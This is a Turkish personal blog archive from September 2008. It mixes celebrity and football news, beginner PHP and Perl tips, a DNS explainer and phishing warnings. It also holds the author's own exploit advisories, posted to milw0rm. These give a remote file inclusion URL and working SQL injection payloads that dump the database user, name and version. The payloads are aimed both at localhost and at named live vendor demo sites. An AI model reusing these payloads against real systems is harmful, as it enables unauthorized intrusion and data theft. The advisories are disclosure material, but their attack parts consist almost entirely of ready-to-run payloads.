"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

30 Eylül 2008 Salı

Artık Sacit Yok


Avrupa Yakası’ndan sürpriz bir ayrılık haberi daha geldi... Hümeyra ve Vural Çelik’in ayrılıp Ata Demirer’in dönüş yaptığı diziden ayrılan son isim “Sacit” rolündeki Tolga Çevik oldu

TOLGA Çevik yeni dönemde Komedi Dükkanı’na ağırlık vermek için Avrupa Yakası’yla yollarını ayırdı.

Önceki gün TTNET’in yeni reklam yıldızının Gülse Birsel ile Özkan Uğur’un olduğuna ilişkin yazı yazmıştım. Yazı çıktıktan sonra bir mail aldım Gülse Birsel’den, reklamın metinlerini kendisinin yazmadığına dair...

Bunun üzerine aradığım Gülse Birsel yeni bir haber olarak Tolga Çevik’in ayrıldığını söyledi.

BİRSEL, “Tolga, yeni dönemde Komedi Dükkanı’na ağırlık vermek istediğini ve ailesine biraz vakit ayırmak istediğini söyledi. Komedi Dükkanı’nın ayrıca turnesi de olacakmış. Bu yoğun trafiğin üstüne bir de Avrupa Yakası zor geleceği için izin istedi. El sıkışarak ayrıldık” dedi. Birsel, çekimleri 12 Eylül’de başlayacak “Avrupa Yakası”nın 24 Eylül’den itibaren ekranda olacağını, sezon başında gidenlerin yerine Ata Demirer’den başka transfer yapmayacaklarını ama ileride diziye sokacağı tek bölümlük karakterlerden tutanları kadrolarına katacaklarını söyledi.

Kaynak: http://www.darknesstown.net/index.php?do=search&story=itibaren&subaction=search

Ramazan Bayramı

Tüm İslam Alemi'nin Mübarek Ramazan Bayramı'nı Kutluyorum... Hayırlara vesile olmasıdır temennim....

29 Eylül 2008 Pazartesi

Microsoft'tan açıklama

İnternette dolaşan Microsoft'un bir tür piyango düzenlediğini ifade eden phishing mesajı hakkında açıklama yayımlandı.
Microsoft'tan geldiği iddia edilen ve Microsoft'un piyango düzenleyip para dağıttığını iddia eden kötü niyetli e-postalar hakkında Microsoft'tan en sonunda bir açıklama geldi. Açıklama aynen aşağıdaki gibi:

Değerli Basın Mensubu,

Microsoft adına birçok asılsız mail yollanmaktadır. Bu sahte maillerden yeni birinin son günlerde yoğun bir şekilde dolaştığını tespit ettik ve sizi de konu ile ilgili olarak bilgilendirmek istedik. Bu mail, Microsoft'un bir tür piyango düzenlediğini ifade eden "Kesin oku, doğruysa yaşadık..." başlıklı mesajdır. Bu mesaj kolaylıkla tahmin edilebileceği gibi tamamen gerçekdışı bir iddiadır ve kötü niyetli kişilerce İnternet kullanıcılarının kişisel bilgilerine ulaşmak için hazırlanmıştır.

Bu vesileyle Microsoft'un hizmet anlayışını ve kullanıcılara önerdiğimiz güvenlik önlemlerini sizlerle paylaşmak istiyoruz.

Kötü niyetli kişilere karşı İnternet kullanıcılarını korumak amacıyla, bu bilgilerin gerekli gördüğünüz bölümünü kamuoyuyla paylaşmanızda her zaman fayda olduğu düşüncesindeyiz.

Saygılarımızla,

Microsoft Türkiye

Kaynak: http://www.habertekno.com/duyuru/microsofttan-aciklama.html

php de metin birleştirme

hemen örneğimize geçelim;

$deger1="hayat";
$deger2="herşeye rağmen";
$değer3="yaşamaya";
$deger4="değer";

echo $deger1.$deger2.$deger3.$deger4;

ve bu uygulama "hayat herşeye rağmen yaşamaya değer" yazısını ekrana vuracaktır.

php fonksiyon oluşturmak ve çağırmak

diyelim ki biz zorlu() diye bir fonksiyon oluşturcaz ve bu fonksiyon ekrana bugrahan diye bir yazı vuracak. hemen başlayalım kodlamaya;


function zorlu() {

echo "bugrahan";

}

zorlu();



evet bu uygulama sonucu ekrana bugrahan yazdırdık.

Sıkıldım

Arıtk bug aramakla uğraşmıycam. insan biraz düşününce gereksiz bir uğraş olduğunu farkediyor. arıyoruz buluyoruz peki amaç ne :S bir süreliğine araverdim. hemde oldukça yorucu bir iş bu ve gerçektende çok zaman harcamanız gerekiyor. şimdilik sadece bloğumla ilgilenecem. yeni yazılar yayınlayacam. bir süre böyle devam eder heralde. hade kolay gele.

28 Eylül 2008 Pazar

str_replace Fonksiyonu

bir yazı içerisindeki kelimeyi değiştirmek için kullanılan bir fonksiyondur.

Komutun Kullanımı:

str_replace( değiştirilecek_kelime , yeni_kelime , aranacak_yer );

örnek:

$ZoRLu="ZoRLu bir blogger üyesidir";

$yeniZoRLu=str_replace(”blogger”,”blogspor”,$ZoRLu);

şimdi biz str_replace fonksiyonunu kullanarak dedik ki $ZoRLu değişkenimizde blogger

yazısını bul ve blogspot ile değiştir yani yeni hali;

$yeniZoRLu="ZoRLu bir blogspot üyesidir"; olur.

Anahtar Kelime Yoğunluğu

arama motorları hangi anahtar kelimeyi daha çok buluyor. biraz araştırınca süper bir-iki site buldum. site adresini yazıp analiz ediyorsunuz ve sitenize hangi anahtar kelimeler kaç ziyaretçi getirmiş size bildiriyor. işte linkler:

http://www.schipul.com/en/sem/keywords/

http://www.articleunderground.com/webmaster/keyword-density-tool.html

27 Eylül 2008 Cumartesi

Bunlara Aldanmayın


şimdi aldığım bir maili sizlerle paylaşmak istedim. efenim güya microsoft para dağıtıyormuş yahu bill gates mal mı ? yada çok çalışmaktan kafayı mı yedi ki durduk yere mail gönderen kişilere para versin dielim ki hotmail.com un reklamını yapmak istedi billo sizce yeterince zaten reklamı yapılmıyormu binlerce kişi hotmail hesabına zaten sahip. yani boş verin dostlarınıza böyle mailler göndermeyin gerenk yok bunlara ;)

The Gemini Portal (lang) Remote File Inclusion Vulnerabilities

The Gemini Portal (lang) Remote File Inclusion Vulnerabilities

link: http://www.milw0rm.com/exploits/6587

Discovered By: ZoRLu

file 1: gemini/page/forums/bottom.php

c0de:

include($lang); (line16)

Exploit 1:

http://localhost/script_path/gemini/page/forums/bottom.php?lang=ZoRLu.txt?

26 Eylül 2008 Cuma

Esqlanelapse Software Project 2.6.2 Insecure Cookie Handling

Esqlanelapse Software Project 2.6.2 Insecure Cookie Handling

Discovered By: ZoRLu

link: http://www.milw0rm.com/exploits/6583

Exploit: resme tıklayın ( click to image )

25 Eylül 2008 Perşembe

Sanal Alemin Zaman Makinası - Wayback Machine

nette dolaşırken bu başlıkla karşılaştım dikkatimi çekti. haberin detaylarını okuyunca şaşırdım vereceğim link sayesinde herhangi bir sitenin eski tasarımı hakkında bilgi edinebiliyorsunuz bende bunu yildirimordulari.org üzerinde denedim ve 146 üyenin olduğu anı gördüm ve oldukça duygulandım :( az emek vermedik hani yildirimordulari.org a. neyse işte o link:

http://www.archive.org

ve işte yıldırım ordularının eski hali:

http://web.archive.org/web/20070623095517/http://www.yildirimordulari.org/

Jetik Emlak ESA 2.0 System Script Multiple Remote Sql injection

Jetik Emlak ESA 2.0 System Script Multiple Remote Sql injection

link: http://www.milw0rm.com/exploits/6549

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/diger.php?KayitNo=[SQL]

http://localhost/script_path/sayfalar.php?KayitNo=[SQL]

[SQL]=

-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example:

http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

Example 2:

http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/*

24 Eylül 2008 Çarşamba

Perl Komut Yazımı

öncelikle bir verinin perl dilinde olup olmadığını nasıl anlarız onu belirteyim:

#!/usr/bin/perl

bu kaynak kodu verimizin perl ile kodlandığına işarettir ve pl uzantılı olur dosyalarımız örneğin test.pl

diyelimki bizim test.pl su sekilde kodlanmış olsun:

#!/usr/bin/perl



print($kod);

şimdi ilk satırdan itibaren açıklayalım:

#!/usr/bin/perl #bu satırda dosyanın yeri belirtilmiştir.

#bu satrıda $kod verisinin klavyeden girilecek bir değer olduğu belirtilmiş.

print($kod); #bu satırda da klavyeden girilen değer ekrana yazdırılmıstır diyelim ki

$kod="ZoRLu"; #olsun

print($kod); #yapıldığında ekrana ZoRLu yazar.

Perl

arkadaşlar kafayı perl ile bozdum Allah nasip ederse bu işi çözecem. bu arada ulaştığım dökümanları burda da yayınlayacam.öncelikle perl nedir onu nasıl bulunmuş onu öğrenelim.
Perl "Practical Extraction and Report Language"(Pratik Çıkarım ve Raporlama Dili) kısaltılmış halidir ve Larry Wall tarafından bulunmuştur. ( tarhi bilmiyorum genelde aklımda tutamam o yüzden hangi tarihte bulunmuş belirtmiyorum ilginizi çekeceğinide sanmıyorum ) programın yüzde 90 ına yakını yazılmıştır yani kullanmak istediğiniz hemen her modül mevcuttur. bu kadar bilgi yeterli bence ama eklemek istediğiniz bilgi olursa yorum olarak yazın ben eklerim fazla bilgi göz çıkarmaz nede olsa ;)

DNS Nedir?

DNS (Domain Name System) , yani alan adı sistemi, internetin çok önemli ve bir o kadar da gizli bir yanını oluşturmaktadır. Bu sistem dünyanın en geniş ve en aktif dağıtılmış veritabanını oluşturarak internetin devamlılığını sağlar. Aynı zamanda da, internetteki alan adlarının tutulduğu ve "e-posta alma-gönderme sağlayıcılarına" ait bilgilerin de saklandığı yerdir. Bu sistem, biz herhangi bir siteye giriş yaptığımızda yada e-mail gönderdiğimizde devreye girer ve alan adı çözümlemesi (domain name resolving) olarak da bilinen işlemi uygulayarak alan adlarının "63.122.198.900" gibi IP (internet protokolü) karşılıklarını bize sağlar.

Aslında, DNS bir telefon rehberi gibidir ve işimizi büyük ölçüde kolaylaştırmaktadır. Konuşmak istediğimiz birinin telefonunu, rehberde o kişinin ismiyle nasıl arıyorsak, bir siteye ulaşmak isteyince de o sitenin karmaşık IP adresini yazmak yerine http://www.metu.edu.tr gibi hatırlaması çok daha kolay olan ismini kullanıyoruz. Aynı şekilde e-posta gönderirken de isim@yahoo.com gibi bir adres yazıyoruz. Üstelik sitenin IP adresi denilen bu kodu anlık olarak değişebiliyorken, DNS sayesinde, biz IP adresinden bağımsız olarak, yine eskiden yazdığımız internet adresini kullanabiliyoruz ve o isimde arama yapabiliyoruz. Her ne kadar DNS in görevi kolay bir işmiş gibi düşünülse de bu yapı bazı zorlukları da beraberinde getirmektedir:

Milyonlarca IP adresi ve onlara bağlı milyonlarca site vardır.
Gün içinde milyonlarca adrese ulaşılmak istenmekte, hatta 1 kişi günde yüzlerce IP adresi talebi yapabilmektedir.
IP adresi ve alan adları günlük olarak değişebilmektedir.
DNS’i farklı yapan şey ise dünyada DNS’den başka hiçbir veritabanın bu kadar çok talebe karşılık veremiyor olmasıdır.

Alan Adı (Domain Name) Nelerden Oluşur?
Birbirlerinden noktalarla ayrılmış alt alanlardan oluşur. Bu alt alanlar için sorgulama sağdan sola doğru olur. Yani en üst düzeyde yetkili isim en sağdaki kısımdır. Mesela en.wikipedia.org adresi için bu ".org" kısmıdır. Sıralamak gerekirse: en büyük alt başlık ".org", sonra wikipedia.org" , daha sonra ise "en.wikipedia.org" tur. Herhangi bir IP adresi olan kısma "hostname" adı verilir. (mesela wikipedia.org veya en.wikipedia.org). "Hostname" ve IP adresleri birebir örtüşmek zorunda değildir. Yani bir "hostname" birden çok sayfaya hizmet sağlayabilir yada aynı şekilde bir "hostname" birden çok IP’ye de sahip olabilir.

DNS nasıl çalışır?
Çalışma prensibi, özyinelemeli sorgulama (recursive query) yöntemine dayanır. Bir sitenin adresini internet tarayıcımıza yazdığımızda, bilgisayarımızın ilk yaptığı şey "DNS önbelleği"ne, yani son günlerde talep edilen DNS’lerin kayıtlarının saklandığı yere, bakmak olur. Eğer bu isim yerel kayıtlarda bulunamazsa bilgisayarımız internet servis sağlayıcısının (ISP-internet service provider) özyinelemeli DNS sağlayıcılarının kayıtlarını sorgulamaya başlar. Olumsuz yanıt gelmesi halinde ise temel isim sağlayıcıları (root name servers) ile iletişime geçilir. Bu 13 isim sağlayıcı, ".com", ".org", ".net" gibi en üst düzey alanların (TLD-Top-Level Domains) kaydına sahiptir. Yani temel sağlayıcı sitelerin teker teker kayıtlarını tutmak yerine yetkili isim sağlayıcılarının kayıtlarını tutar. Mesela www.google.com'a tıkladığımızda, bu sağlayıcı "com" için ayrılan alanın kayıtlarına bakar. Bir sonraki sorgu ".com" kısmını geçerek "google.com" için yapılır. Bu internet adresi için var olan kayıtlar alınıp bilgisayarımızın ilk sorguyu yaptığı yerel önbelleğe (local cache) koyulur. Artık bu kayıt yerel hafızaya alındığından, bir sonraki talebe cevap çok daha hızlı gelir. IP, bu kayıtlardan okunduktan sonra internet tarayıcısına sağlanır. Böylece sayfa ekranımızda görüntülenir.

Kısaca; DNS bizim için internet ve e-posta adreslerinin IP karşılarını bulur ve böylece bilgisayarın bu adresleri algılamasını sağlar. Arama normalde, önce temel sağlayıcının kayıtlarından başlarken, bu süreci kolaylaştırmak için, internet sağlayıcısının kayıtları ve bilgisayarın yerel kayıtları kullanıma sokulur. Bu hiyerarşik sistem, internetin devamlılığı için çok önemlidir çünkü milyarlarca talebe karşılık vermek zorunda olan temel isim sağlayıcıları (root nameservers) ancak bu şekilde aşırı yüklenmeden korunmuş olurlar.

Kaynak: http://e-bergi.com/2007/Aralik/DNS-Nedir

Bug ve Debug

sıklıkla kullandığımız bug ve debug kelimelerinin anlamını hiç merak ettiniz mi ? ben merak ettim ve biraz araştırdım enteresan sonuçlara ulaştım. bug:böcek debug:böcekten arındırma anlamlarını içeriyormuş. neden bunlar kullanılmış işte burası dahada ilginç. Grace Hopper ( belki duymuşsunudur ünlü kadın programcı ) bir program yazmış fakat bu program hatalı çalışıyormuş ne yapmışsa hatayı çözememiş. daha sonra bilgisayarın röleleri arasına sıkışan bir böceğin sorunun kaynağı olduğunu görmüş. bug ve deug anlamlarını burdan almış.

23 Eylül 2008 Salı

enteresan bir mail


son bir kaç aydır sıklıkla aldığım bir mail. amaç ne henüz anlamış deilim bir takım bilgiler isteniyor :P napacaksa artık bana ait bu bilgileri isteyen kişi.

USB 3.0 Kullanıma Hazır


Geliştirilmesi büyük ölçüde Intel tarafından yapılan USB 3.0 sunuma hazır.

Standardın geliştirilmesi tamamlandığından USB 3.0′ı kullanan cihazların piyasaya çıkması da uzun sürmeyecek.

USB 3.0, USB 2.0′a göre hız çıtasını oldukça yükseltiyor. Transfer hızını yaklaşık 10 misline çıkaran yeni standart saniyede 600MB’a karşılık gelen 4.8Gbit bant genişliğine sahip. Yeni standardı destekleyen firmalar arasında NVIDIA ve AMD gibi endüstri devleri de bulunuyor

Kaynak: http://www.teknoportal.gen.tr/haber_detay.asp?haberID=841

Crysis Warhead Satışa Sunuldu


Crysis Wars® Daha önce hikayesi ve ana karakteri ile ilgili bilgiler verilen Crysis’in devam oyunu Crysis Warhead nihayet satışa sunuldu.

Electronic Arts’ın online mağazasında 29,95 dolar satış fiyatıyla görülen Crysis Warhead, daha geniş bir çoklu oyuncu deneyimi yaşatacak. Crysis Wars olarak adlandırılan bu yeni deneyim, 7 tanesi tamamen yeni olmak üzere toplamda 21 harita ve yeni çoklu oyuncu modları içerecek.

Tek oyunculu kipin yanısıra "Crysis Wars" adı altında bir çok oyunculu kip de içerecek olan oyunun, 3 farklı karşılaşma tipi ve 21 değişik haritası var.

kaynak: http://www.teknoportal.gen.tr/haber_detay.asp?haberID=863

Google Video Arama "Gaudi"


Google artık videoları da konuşma içeriklerine göre dizine alabilecek. Google-Audio-Indexing yahut basitçe "Gaudi" olarak adlandırılan teknoloji film kayıtlarındaki dili kendi başına çözebiliyor ve dizine alabiliyor.

Yeni teknik ile arama yapılabilen ilk videolar şu an için sadece ABD politikacılarının seçim kampanyası için yaptıkları konuşmalardan ibaret. Mesela politikacıların yaptıkları konuşmalarda belli replikleri aratabiliyor ve bu sırada doğrudan aranan terimin bulunduğu kareye atlayabiliyorsunuz.

Arama hizmeti halen "Google Labs" aşamasında bulunuyor. Bir beta sürümün ne zaman çıkacağı ise henüz belli değil.

Denemek için Google'ın GAUDİ sayfasını ziyaret edebilirsiniz.

22 Eylül 2008 Pazartesi

Engin Nurşani kaza geçirdi

Geçenlerde rastladığım ve çok üzüldüğüm bir haber. Engin Nurşan^'ye acil şifalar diliyorum.

KAHRAMANMARAŞ - Türk Halk Müziği sanatçısı Engin Nurşani Kahramanmaraş'ta geçirdiği trafik kazasında ağır yaralandı. Yoğun bakım ünitesinde tedavi altına alınan genç sanatçı yaşam mücadelesi veriyor.
Alınan bilgiye göre, Kahramanmaraş'ın Elbistan ilçesinde Cumartesi günü Ceylan Türkü Cafe adlı iş yerinin açılışını yapmak üzere ilçeye gelen Engin Nurşani, açılıştan
sonra hayranlarının yoğun ilgisi altında programını tamamladı.
Nurşani, gece saat 01.30'da arkadaşı Mustafa Kara ile birlikte Gaziantep'e dönmek üzere yola çıktı. Arkadaşı Mustafa Kara'nın kullandığı 27 LK 379 plakalı otomobil Göksun- Kahramanmaraş karayolu Püren Tüneli girişinde aşırı hız ve dikkatsizlik yüzünden şarampole yuvarlandı. Yoldan geçen araçlardan birinin kazayı fark ederek durumu jandarmaya bildirmesiyle ünlü sanatçı Engin Nurşani ve arkadaşı Mustafa Kara ambulansla Kahramanmaraş Devlet Hastanesi'ne getirilerek tedavi altına alındı. Boynu kırıldığı belirlenen Engin Nurşani'nin akciğerinde kanama da tespit edildiği öğrenilirken, genç sanatçı yoğun bakım ünitesine kaldırıldı.
Kazayı haber alan Engin Nurşani'nin babası Ozan Ali Nurşani de Kahramanmaraş'a geldi. Kaza ile ilgili soruşturma sürdürülüyor.

21 Eylül 2008 Pazar

Diesel Pay Script (area) Remote SQL Injection Vulnerability

Diesel Pay Script (area) Remote SQL Injection Vulnerability

Discovered By: ZoRLu

http://www.milw0rm.com/exploits/6502

Exploit:

http://localhost/script_path/index.php?a=browse&area=[SQL]

[SQL]=

ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*

Demo:

http://www.dieselscripts.com/demo/dieselpay/index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*



20 Eylül 2008 Cumartesi

Sağır Oda Müzikleri


bir zamanların popüler dizisi sağır odaya ait hemen her müzik mevcut. benim hoşuma gidiyor müzikleri. ilgilenenler için yayınladım.

TIKLA iNDiR

19 Eylül 2008 Cuma

bellinzona galatasaray maçının özeti

Açıkcası çok zevkli bir maç olduğunu söyleyemeyeceğim. Cimbom rakibi hafife alıyordu dolayısıyla da pek istekli oynadığı söylenemez : ( işte maçı özeti

galatasaray isviçre’nin bellinzona takımını deplasmanda 4-3 yendi ancak oynadığı futbolla tat vermedi.

maç galatasaray için adeta antrenman havasında geçti. zayıf rakibi karşısında isteksiz bir görüntü çizdi; ancak tur için avantajlı bir skor elde etti.

60. dakikada bir oyuncusu kırmızı kart görmesine rağmen galatasaraya gol atabilen rakip takım oldukça istekli top oynadı.

oynanan bu futbolla galatasaray seyircisini ölüp ülüp diriltti.

Stat: St. Jakob-Park / Basel

Hakemler: Sorin Corpodean, Cristian Constantin Nica, Octavian Sovre

Bellinzona: Gritti, Siqueira, Mangiarratti, La Rocca, Bernardet, Gürkan, Wahab, Garrido, Gashi, Kalu, Lustrinelli

Galatasaray: De Sanctis, Emre Aşık, Meira, Servet, Volkan, Serkan Kurtuluş, Ayhan, Lincoln, Kewell, Baros, Nonda

DK 32: Gol Lustrinelli. Defansımızın arkasına atılan bir top. Servet ve Meira anlaşamadı. Lustinelli cezasahasına girerken topa vurdu ve De Santis’i mağlup etti. 1-0

DK 39: Gol Kewell. Cezasahası içinde sol tarafta topu indirdi. İndirdiği anda da çok sert ve düzgün vurdu. Bellinzona kalecisinin yapacağı bir şey yoktu. 1-1.

ilk yarı sonucu: GALATASARAY 1-1 BELLİNZONA

DK 47: Gol Gürkan Sermeter. Galatasaray defansı ofsayt bekledi. Gürkan ara pasını önüne aldı. Vuruşunda topu birkez daha ağlarımıza yolladı. 2-1

DK 51: Gol Baros. Cezashası içine havadan gelen topa Baros müthiş yükseldi vuruşunu yaptı ve topu ağlara yolladı. 2-2

DK 60: Bellinzona 10 kişi kaldı. Emre topsuz alanda Gashi’nin tekmesiyle yerde kaldı. Hakem kırmızı kartını Gashi’ye tereddütsüz gösterdi.

DK 80: Gol Milan Baros. Gürkan Sermeter’in hatalı pası. Baros araya girdi. Gritti ile karşı karşıya kaldı. Çalımını attı. Vuruşunu yaptı ve topu bir kez daha ağlara yolladı. 2-3

DK 89: La Rocca kornerden gelen topu kafa ile birkez daha ağlarıma yolladı. 3-3

DK 90+4: G.Saray için son şanslar. Lincoln cezasahası önünde topu önüne aldı. Vuruşu rakibinin ayağından seken top Gritti’yi de aştı ve top bir kez daha ağlara gitti.

MAÇ SONUCU: BELLİNZONA 3-4 GALATASARAY

18 Eylül 2008 Perşembe

Fenerbahçe Porto Maçı Özeti

Porto: 3 - Fenerbahçe: 1


Şampiyonlar Ligi (G) Grubu'nun ilk maçında deplasmanda FC Porto ile karşılaşan Fenerbahçe, 2 dakika arayla gelen gollerin şokundan Güiza'nın golüyle sıyrıldı ancak sonunu getiremedi ve 3-1'lik mağlubiyetle gruba puansız başladı.

Her iki takımında dengeli başladığı karşılamada 5. dakikadan itibaren etkili olmaya başlayan FC Porto, 12. ve 13. dakikada Fenerbahçe'de defans boşluğunda oluşan hataları iyi değerlendirerek yıldız futbolcuları Lisandro ve Lucho ile arka arkaya goller buldu
Erken gelen gollerle rahatlayan ev sahibi takım, Fenerbahçe'nin 30. dakikada Güiza ile bulduğu gole kadar tamamen maça hakim olan taraf oldu. 29. dakikada ilk kez organize bir atak geliştiren Fenerbahçe attığı golden sonra hırslandı ve maça ortak olmaya başladı. Porto ise kontrollü oyunla skoru koruyup, üzerine gelen Fenerbahçe karşısında kontra ataklarla gol bulmaya çalıştı.

İlk yarısı Porto'nun 2-1 üstünlüğü ile geçilen karşılaşmanın ikinci yarısına Josico değişikliğiyle başlayan Fenerbahçe'de, Josico'nun oyuna girdikten sonra sakatlanması Aragones'in planlarını değiştirdi. Josico Burak'la yer değiştirdi.

Karşılaşmanın son 10 dakikasında futbol bir anda çehre değiştirdi. Fenerbahçe Güiza ve Emre ile yakaladığı pozisyonlardan yararlanamazken, ev sahibi Porto son dakikada lino ile yakaladığı pozisyonu gole çevirmeyi başardı ve karşılaşma 3-1 sona erdi.

17 Eylül 2008 Çarşamba

EasyPHP-2.0b1-setup.exe Download

easyphp ile php kaynak kodlu dosyaları çalıstırmanız mümkün. php scriptlerde açık ararken script kurulumu için sizlere faydalı olacaktır.

TIKLA iNDiR

16 Eylül 2008 Salı

Nedim Doğan'ın dramı

Biliyorsunuz Kurtlar Vadisi adlı dizide hüsrev ağanın sağ kolunu oynamıştı nedim doğan ve kısa bir süre önce lenf kanserine yakalanmış görünce şok oldum Allah tan acil şifalar diliyorum kendisine. işte detaylar:



Kısa bir süre içerisinde lenf kanserine yakalanan ve tanınmayacak derecede zayıflayan Nedim Doğan’ı Mega Magazin programı görüntüledi. Evinde yatan Nedim Doğan dostları tarafından aranmamaktan şikayetçi. “Oynamadığım dizi televizyon kalmadı, ünlü ünsüz herkes bir kere arasa, üç ay kimsenin aramasına gerek kalmaz o üç ay da bana yeter toparlanmam için” diyerek ilgi isteyen Nedim Doğan, kendisine Levent Kırca ve Ercan Yazgan’ın aradığını Levent Kırca’nın Borum’daki evinde eşiyle kendisini 5 gün misafir ettiğini söyledi.


Her yeri yara
Nedim Doğan’ın vücudu hastalıktan dolayı yara dolu. “Şu anda ağzım yara su içemiyourum doya doya bi su içeyim, karnımı doyuracağım, sete koşacağım” diyen Nedim Doğan, bu zamana kadar biriktirdiği paranın ancak 1-2 ay kendisine bakacağını söyledi. İyileşir iyileşmez sete koşacağını da söyleyen Nedim Doğan, “zaten levent kırca bekliyor, tiyatro oyunları hazırladım ben hazırım kendimde güç bulursam atacam sahnelere, tiyatroya koşacağım, şartlar ne olursa oynayacağım, inşallah ama inanıyorum ki ben sahnede öleceğim, onu da çok istiyorum” diyor.

Sevgimizi anlatamadık hastalığımızı anlattık

Medyanın kendisi gibi karakter oyunucularına ilgi göstermediğinden de yakınan Doğan, bu siteminini şu sözlerle anlattı: “Sevgilerimizi aşklarımızı anlatamadık hastalığımızı anlattık. Halkımız hastalığımızı bilmek ister”.

1945 yılında doğan Nedim Doğan, 1966 yılında Bakırköy Halkevi'nde tiyatroya başladı. 1982 yılına kadar öğretmenlikle tiyatroyu bir arada yürüttü. 1982 yılında öğretmenlikten istifa ederek Ercan Yazgan - Bülent Kayabaş tiyatrosunda profesyonel oldu. Çevre Tiyatrosu, Nokta Tiyatrosu, Ali Poyrazoğlu Tiyatrosu, Yasemin Yalçın Tiyatrosu çalıştığı tiyatrolardır.

Kaynak: http://www.panafilmforum.com/viewtopic.php?f=9&t=41556&st=0&sk=t&sd=a&start=15

Galatasaray Bellinzona Maçının Biletleri Satışta

Büyük Güne az kaldı 18 Eylül hesaplaşma tarihi. inş. cimbom yüzünün akıyla bu sınavıda verir.

18 Eylülde İsviçrenin Basel kentindeki St. Jakob-Park’ta oynanacak maçın biletleri satışa çıktı.

Yerel saat ile 20:00′da başlayacak maçın bilet fiyatları 30 ile 295 İsviçre Frangı (Yaklaşık 33 ile 320 YTL) arasında değişmektedir.

Bu arada, 16 yaşından küçüklerin, indirimli biletle maçı kale arkası tribünden 10 İsviçre Frangı’na izleyebildikleri açıklandı.

Maç günü stat kapılarının yerel saatle 18.00′de açılacağı duyuruldu.

Fenerbahçe Porto maçı için geri sayım başladı

Koyu bir cimbomlu olmama rağmen fenerbahçe nin bu haberine yer vermek istedim bloğumda ee nede olsa gâvurlarla oynuyor destek olmalıyız demi ;)

Avrupa Şampiyonlar Ligi "G" grubunda 17 Eylül Çarşamba günü oynanacak Porto-Fenerbahçe maçı öncesinde, evsahibi takımı en fazla ilk maç sendromu korkutuyor.
--------------------------------------------------------------------------------
Madrid - Portekiz basını, Şampiyonlar Ligi’nde son 7 yıldır ilk maçta galibiyet alamayan, son olarak 2001 yılında deplasmanda Rosenborg’u 1-2 yenen Porto’nun, psikolojik olarak maça hazırlandığını belirtti.

Son olarak 30 Ağustos tarihinde maç yapan ve Benfica ile 1-1 berabere kalan Porto, milli maçlar arasının ardından 18 gün sonra ilk maçını Fenerbahçe’ye karşı oynayacak. Sakat olan futbolcuları iyileşen ve tam kadro Fenerbahçe maçına hazır olan Porto’da teknik direktör Jesualdo Ferreira’nın, dizindeki sakatlığından 3 haftadır sahalardan uzak olan, ancak hafta içinde sorunsuz takımla birlikte antrenmanlara çıkan Arjantinli forvet oyuncusu Mariano Gonzalez’i ilk 11’de oynatması bekleniyor.

Öte yandan, Porto kulübünden yapılan açıklamada, Fenerbahçe’nin yarın Portekiz saati ile 13.05’de (TSİ 15.05) Porto’ya varacağı belirtildi. Teknik direktör Luis Aragones 19.30’da Estadio do Dragao’nda (Ejderha Stadı) basın toplantısı yaparken, Fenerbahçe maç saatine denk gelen 19.45’de antrenman yapacak. Porto ise maç öncesi son antrenmanını yarın sabah 10.00’da gerçekleştirecek.

Porto kulübü, maçta en az 40 bin taraftar beklerken, biletler 25 ile 50 Avro arasında satılıyor.

Kaynak:

15 Eylül 2008 Pazartesi

Notepad2.exe


notepad in üst sürümü php asp vs dosyalar için biçilmiş kaftan. çünkü karekter sorunu vs olmuyor.

link 1: TIKLA iNDiR



link 2: TIKLA iNDiR

Activeperl Download

bazılarımızın bulmakta zorlandığı activeperl ( bende dahil ) bulunca indirdim ve upload yapıp siteye ekledim umarım işinize yarar.

TIKLA iNDiR

Google neden "Chrome"u yaptı?

artık yeni bir tarayıcı mevcut biliyorsunuz ve bu google a ait ( mevcut bir çok açık var ) google; chrome u neden yapmış işte açıklaması:


Açıklamaya göre, kullanıcıların internette aradıkları içeriği aramalarını ve bulmalarını kolaylaştıracak şekilde tasarlanan Google Chrome, birbirine entegre bir arama ve adres çubuğu ile kullanıcıları hızla ve çoğu zaman sadece bir iki tıklama ile gitmek istedikleri yere ulaştırıyor.

Kullanıcılar Google Chrome'da yeni bir sekme açtıklarında, en çok ziyaret ettikleri sayfanın, en son yaptıkları aramaların veya sık kullanılan sayfaların, bilgisayar diliyle anlık görüntülerini içeren bir sayfaya gidiyor.

Google Chrome'un Windows Beta sürümü "http://chrome.google.com" adresinden indirilebilirken, Mac ve Linux için Google Chrome'nin ise önümüzdeki aylarda kullanıma sunulacağı bildirildi.

Google'un açıklaması

Arama motoru olarak kullanıcıların gönlünü fetheden Google neden bir web tarayıcısı yaptığını şöyle açıkladı:

"Bizler Google'da zamanımızın büyük bir kısmını bir Internet tarayıcısı kullanarak geçiriyoruz. Aynı tarayıcıda arama yapıyor, chatleşiyor, e-posta gönderip alıyor ve birlikte çalışıyoruz.

Herkes gibi bizde boş zamanlarımızda alışveriş yapıyor, banka hesabımızı kontrol ediyor, haberlere göz gezdiriyor ve arkadaşlarımızla görüşüyoruz ve bütün bunlar için bir tarayıcı kullanıyoruz. İnsanlar her geçen gün zamanlarının daha büyük bir kısmını Internet'te geçiriyor ve 15 yıl öncesinde Internet'in ilk günlerinde akla hayale gelmeyecek şeyler yapıyor.

Internet'te bu kadar uzun zaman geçirdiğimizi gördükçe eğer sıfırdan bir tarayıcı yaratılsa nasıl olurdu diye düşünmeye başladık.

Fark ettik ki Internet, basit metin sayfalarından gelişerek zengin ve interaktif uygulamaların olduğu bir yer haline gelmişti ve bu nedenle geliştireceğimiz Internet tarayıcısını sil baştan düşünmemiz gerekiyordu.

Artık ihtiyacımız olan sadece bir tarayıcı değil, web sayfaları ve uygulamaları için modern bir platformdu ve biz de bu amaçla yola çıktık.

Çalışmalarımızın sonunda yeni bir açık kaynaklı Internet tarayıcısının beta versiyonunu yayınlıyoruz: Google Chrome.

